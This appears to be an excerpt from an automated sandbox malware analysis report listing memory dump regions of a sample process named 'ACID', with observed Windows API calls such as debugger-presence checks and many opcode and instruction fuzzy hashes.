                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 078F9E7F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078FAFEE,?,?,?,?,?), ref: 078FB0AF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,078F87D9,00000800,00000000,00000000), ref: 078F89EA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,078F87D9,00000800,00000000,00000000), ref: 078F89EA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 078FA000
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,078F8524), ref: 078F875E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 078FA000
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c1a97257e82d00955886321a5706cc5e8d7bea9cdf905b6c30589dc5fe3e34b
                                                        • Instruction ID: eafb6ba48b71f146835e7c287a5e1aeb29c7b349d08606793791049608e72038
                                                        • Opcode Fuzzy Hash: 8c1a97257e82d00955886321a5706cc5e8d7bea9cdf905b6c30589dc5fe3e34b
                                                        • Instruction Fuzzy Hash: 39C1CE70B11606CBCB08BFB9DA9862EBBF5FF88700F504568D445E7395EA349C15CB92
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49b07b8a04280d3282ef86ed06fe6834e4f3464ba0d79dcd15a50f5122590989
                                                        • Instruction ID: ba00b86367a36c467339af6deff07beb44c5b007fb39bba4a045a5966be440c7
                                                        • Opcode Fuzzy Hash: 49b07b8a04280d3282ef86ed06fe6834e4f3464ba0d79dcd15a50f5122590989
                                                        • Instruction Fuzzy Hash: 15C1CF70B11606CBC708FFB9D99862EBBF2FB88600F504569D445E7395EA349C15CB92
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3fdc9550da40715cbf3ea14cf60f1ca99c912133079efe76e3c3c3256f006f12
                                                        • Instruction ID: 09476f2abf46dde2a0b272126f629b925b5a04cf2e94aa7c368f94e5b69ef159
                                                        • Opcode Fuzzy Hash: 3fdc9550da40715cbf3ea14cf60f1ca99c912133079efe76e3c3c3256f006f12
                                                        • Instruction Fuzzy Hash: 5B91AC70B11605CFC708BFB8E99963EBBB6FB88601F844A68E445D7385DE389854CB91
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b02ea63d45f218f39d964a6d197008d7133498e5642632dbf4706eca5c292c7a
                                                        • Instruction ID: 0131f0331c1934501c56d93b4eef6542da4bcc094e7a4dbd8f7edc58be638314
                                                        • Opcode Fuzzy Hash: b02ea63d45f218f39d964a6d197008d7133498e5642632dbf4706eca5c292c7a
                                                        • Instruction Fuzzy Hash: 25716B70B1160ACFCB04EFBDD994A2EBBE6FBC8621F408529D445D7348EA34D855CBA1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a033532906f61d0acfa6ca494fdc0f11057978ab8cc2c1cc1f68a40863ba41e
                                                        • Instruction ID: 40df6d49843c81d9162aaa089d20a8394948ce3441d3c473c4b0434d1f4730f5
                                                        • Opcode Fuzzy Hash: 5a033532906f61d0acfa6ca494fdc0f11057978ab8cc2c1cc1f68a40863ba41e
                                                        • Instruction Fuzzy Hash: 7C51FCB0B066498BC704FFB9DD9466EBBF6BF88610F458569C448E7384EE349C01CB92
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ebdc1b13ece461367d5c37e4de719672debb581a8a2847b44759eef5fc5a86ee
                                                        • Instruction ID: 9a2acde6dff63fb9fe8a45c637aff0a0dc7310294f24e002f17223b03710be16
                                                        • Opcode Fuzzy Hash: ebdc1b13ece461367d5c37e4de719672debb581a8a2847b44759eef5fc5a86ee
                                                        • Instruction Fuzzy Hash: BB519C70B116198BC704FFBEDD9566FBBEABBC8610F448529D449E3344EE34A8118B91
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17d731aa7c2449d3f119d7c28c16eada049639a770dea31c34af634bc01e7582
                                                        • Instruction ID: 3bb578f72a2c154a827342a4898453858c0a7ce69b4f3588f799cc635ba34724
                                                        • Opcode Fuzzy Hash: 17d731aa7c2449d3f119d7c28c16eada049639a770dea31c34af634bc01e7582
                                                        • Instruction Fuzzy Hash: A4512D30B1022DDFDB149BADD85CAADBBF6BB88308F105426E50AAB394CB31DC45CB51
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46f56f438b4d368605415dcb6703159588a508f9d772c35d3d0053bc62ca0e52
                                                        • Instruction ID: 0d96797c912877e57a848ffc2ccbd20e11db770187df50dd5523b5d65a73d548
                                                        • Opcode Fuzzy Hash: 46f56f438b4d368605415dcb6703159588a508f9d772c35d3d0053bc62ca0e52
                                                        • Instruction Fuzzy Hash: B341E37060D7818FC306AB79D8A452DBFF2EFC2210F45859FD0D9DB292DA389865C792
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0149a25c09ae8794905d11b449b3525047bc1c1750802b6acf60a1554bee4d8
                                                        • Instruction ID: 8ec483f70556eadc7495f5677e76801a1f9596e6bddc57de82a18b639fe2553a
                                                        • Opcode Fuzzy Hash: f0149a25c09ae8794905d11b449b3525047bc1c1750802b6acf60a1554bee4d8
                                                        • Instruction Fuzzy Hash: 12311571B092858FC701EFB9DC9466EBFB5FF85610F4485AAD445DB342DA388805CBA1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a91c1ad102186b750698d428b35fd508db7f293881f9664014bd4a517a1e8307
                                                        • Instruction ID: cd4e617ad6221c3a2dca2fe374a3c893d2f627c262ff889867530824c24fc3f9
                                                        • Opcode Fuzzy Hash: a91c1ad102186b750698d428b35fd508db7f293881f9664014bd4a517a1e8307
                                                        • Instruction Fuzzy Hash: F8416C31A14328DFDF199BACD59DBAD7BF6BB48308F106426E80AAB6D5C731C844CB51
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 402437acc049ae74fba29a33fd1cf7f7eb65374b9b8fa370473ba285473f4ed6
                                                        • Instruction ID: b8be2a42db79801a7b91a92e9c0857ad0f2d3599ad2c249a096e2348453cfe9c
                                                        • Opcode Fuzzy Hash: 402437acc049ae74fba29a33fd1cf7f7eb65374b9b8fa370473ba285473f4ed6
                                                        • Instruction Fuzzy Hash: A021F271B156558BC704BBB9DC9866EBBF5FF88610F40856AD048D7340DE389C11C7A2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a7886712a58ce4a62fa7c5f3bf5c46ad2ef4284a09c1cf4fa28a85f4448169f
                                                        • Instruction ID: b5f9dc2e949be91552366848bf7c40ba92c628c92c25ad81e5f24ae717d61094
                                                        • Opcode Fuzzy Hash: 5a7886712a58ce4a62fa7c5f3bf5c46ad2ef4284a09c1cf4fa28a85f4448169f
                                                        • Instruction Fuzzy Hash: FE213371104204DFDB01EF54D9C0B5ABFA6FBA8328F20C16DE9091B756C73AF446CAA1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25f2916e67a53d33005f5fbc7dab81e09f519b3a470282c4b966db0c9ab8800a
                                                        • Instruction ID: 32becf3ca7705c8e9c4879a95f0fd1fe135fa2788b42aa5e5da882c5307a94a9
                                                        • Opcode Fuzzy Hash: 25f2916e67a53d33005f5fbc7dab81e09f519b3a470282c4b966db0c9ab8800a
                                                        • Instruction Fuzzy Hash: A0212571500204EFDB15DF58D9C0B2ABFA5FB9831CF2085ADE9094B256C736E456CBE1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3a1435c0d6efac55aef804826fa25cc10c42ba7d79be4409e49bdcbce128389
                                                        • Instruction ID: d1136f603b3a471315c94043af75336f0d890148a8057ec85347d2f67669cc2d
                                                        • Opcode Fuzzy Hash: f3a1435c0d6efac55aef804826fa25cc10c42ba7d79be4409e49bdcbce128389
                                                        • Instruction Fuzzy Hash: DA11A271B15619CBC704BBBEED9862FF7A9FB88610F508529D449D3340EE38DC1187A1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction ID: 8e916592f89bf307036464594aaab12a83a2b4703f4aee61d0385e8d08d2778f
                                                        • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction Fuzzy Hash: 1111DF76404244CFCB02CF54D5C0B56BFA2FB94328F24C2A9E8090B757C33AE456CBA2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction ID: 6244f44afcd5ab4ac7ac7a0882856bbcfee7bf0b31a1033444b338baf9a4c734
                                                        • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction Fuzzy Hash: DD11B176504244CFDB16CF54D5C4B16BFB2FB94318F24C6A9D8094B257C33AE456CBA1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be970ba661f73a2dee5217847ecd122a3d8c5e8fe16f176b81515eebb6b4f35d
                                                        • Instruction ID: 69eb02ffad9b03c9a2d4e5d7fc82da4e3e53cccf3f362390af6fd05ca7c75cbd
                                                        • Opcode Fuzzy Hash: be970ba661f73a2dee5217847ecd122a3d8c5e8fe16f176b81515eebb6b4f35d
                                                        • Instruction Fuzzy Hash: FC01D4314043449BF7218B99CD84766FFDCEF51228F18C45AEE0C4A282C279A441C6B2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e93290585a0f46a3fdcfe59b7c5071a7066d1dd88a4a2428d4f9b1c6a4d2b7bb
                                                        • Instruction ID: 3562aac7d60118a2acbb896e78e6e39f49193646a7bd61dbb863d3f7eef45491
                                                        • Opcode Fuzzy Hash: e93290585a0f46a3fdcfe59b7c5071a7066d1dd88a4a2428d4f9b1c6a4d2b7bb
                                                        • Instruction Fuzzy Hash: 64F0E93111D3C1CFEB1A6B74D9690903F70EE4322634985EBF881C72A7CA35C015C721
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f17d378a91a84712be9065874e78d2e7e5dea8f3a636d7d1a218a47899ef301
                                                        • Instruction ID: b70b0a33e82ce7ea5d5a540d8d4bec636dd2d5ea0aa9477b3f9717ba67b04e02
                                                        • Opcode Fuzzy Hash: 8f17d378a91a84712be9065874e78d2e7e5dea8f3a636d7d1a218a47899ef301
                                                        • Instruction Fuzzy Hash: E7F06271405344AFF7118F59DDC4B62FFD8EB51629F18C45AED0C5A286C379A844CAB1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5a2bdd8a2ed9a2ef870c8439633032ecac985ffc958d8f0993d5c39c58a4a62
                                                        • Instruction ID: c221b71e11093a5cd09e41f5d4cd960ba73508022a9c22aa98340c5da3b657ca
                                                        • Opcode Fuzzy Hash: a5a2bdd8a2ed9a2ef870c8439633032ecac985ffc958d8f0993d5c39c58a4a62
                                                        • Instruction Fuzzy Hash: 25F037B0D0424AEFEB04CFB9D406AAEBFF0AF4A210F1185AAD900EB201D7708541CB91
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b3db17b05cc972a714f0122e7715fd7c7b0a1d17887bfde3ecfb4901ad2a225
                                                        • Instruction ID: 1fd13af98eae13491eec6285d128527959ff8e7b63ac47c19b56be7e7886a65d
                                                        • Opcode Fuzzy Hash: 8b3db17b05cc972a714f0122e7715fd7c7b0a1d17887bfde3ecfb4901ad2a225
                                                        • Instruction Fuzzy Hash: D1F0DAB0D0420ADFDB54DFADD841AAEBFF4FB48210F5085AAD918E7204DB74D6118B91
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
• String ID:
• API String ID:
• Opcode ID: 27a463a9526114a04ba55cf5eeb52c456b0144826fa8a05ccecf05e54c925d18
• Instruction ID: 40e530d1162fe3102fda0a56e904ddbbb674736089b6cd2c43f839fd39d77373
• Opcode Fuzzy Hash: 27a463a9526114a04ba55cf5eeb52c456b0144826fa8a05ccecf05e54c925d18
• Instruction Fuzzy Hash: 6DF039B8C40206DFDB40DFB9D40665EBFF0BF09211F1184AAD005EB222D7704540CF81

Memory Dump Source
• Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5988715afc6849c3255f2d3826236c7d982b034f11e711d7ee20a28c05b7e6ec
• Instruction ID: cfe73fa9f2fe361e1e08fa9bfe322c49ea157ea64700434dbffbdd412c3f3d06
• Opcode Fuzzy Hash: 5988715afc6849c3255f2d3826236c7d982b034f11e711d7ee20a28c05b7e6ec
• Instruction Fuzzy Hash: FDF06531119381CFFB1A2B74D4190513F70EE5621630948D9E886C6252CB328000CB11

Memory Dump Source
• Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c610fa1a49ee5fd06a15cdde024757284acd8c23f38d304eb8c818a30079def
• Instruction ID: f922d05e0d6984d499d5f8bbf713141be1d2b8dc6e1d350bfe862eb6086e5ff6
• Opcode Fuzzy Hash: 2c610fa1a49ee5fd06a15cdde024757284acd8c23f38d304eb8c818a30079def
• Instruction Fuzzy Hash: FED0A7B26041586BCB1897FC99553DF6F99DF84660F0844AEE04DF3241C931A5404755

Memory Dump Source
• Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9c9aa6e470d50df8de93b6dcfcd818e96c6089ae80b27142453f1c6171c6564b
• Instruction ID: 24647cfbf235119f82bd7b4947ba37763e8a1d52fe0195f5839584371e420812
• Opcode Fuzzy Hash: 9c9aa6e470d50df8de93b6dcfcd818e96c6089ae80b27142453f1c6171c6564b
• Instruction Fuzzy Hash: F3E046B8D0020ADFC740EFBED904A5EBBF0BF08200F10C5AAD018E7215EBB086008F80

Memory Dump Source
• Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6b88d90c4895ca87f1a15a9a2556e6ba7a5bbb1cd201a3fe3eae7f21a9df0ccb
• Instruction ID: 43e2ed52ad59af433dc0065f04e4a8ec232e425321e2cdf961be750f0a499ebf
• Opcode Fuzzy Hash: 6b88d90c4895ca87f1a15a9a2556e6ba7a5bbb1cd201a3fe3eae7f21a9df0ccb
• Instruction Fuzzy Hash: CDE0B630225305CBEB1C7FB5E4195653B69FB846167958168F80681284CF329401CF50

Memory Dump Source
• Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08435d9a15a1796cc4ff229f9044c3ef7a38acf27498314f13d41e72ab3fe831
• Instruction ID: ddaf0f6192ecf40ffd3100ed34f3853aaf837cf381a74334021fe69cff2c97ed
• Opcode Fuzzy Hash: 08435d9a15a1796cc4ff229f9044c3ef7a38acf27498314f13d41e72ab3fe831
• Instruction Fuzzy Hash: AFD0123615410D9F8B41EF98F840D527BECAB54651740C062F508C6120EA21F574EB52

Memory Dump Source
• Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 846f771f603d2af9ac115ad3027576e2e661b02a1d3e57c7d8f50dad7a7bb22c
• Instruction ID: d1b23a6e2e6e2f6bfb444137cfd4f2ac349bd91a7d730cf3ff0d877e07250dc1
• Opcode Fuzzy Hash: 846f771f603d2af9ac115ad3027576e2e661b02a1d3e57c7d8f50dad7a7bb22c
• Instruction Fuzzy Hash: 25B01237B04408D80900008D78410D8F35CE1C41376008163D71E41405123122344151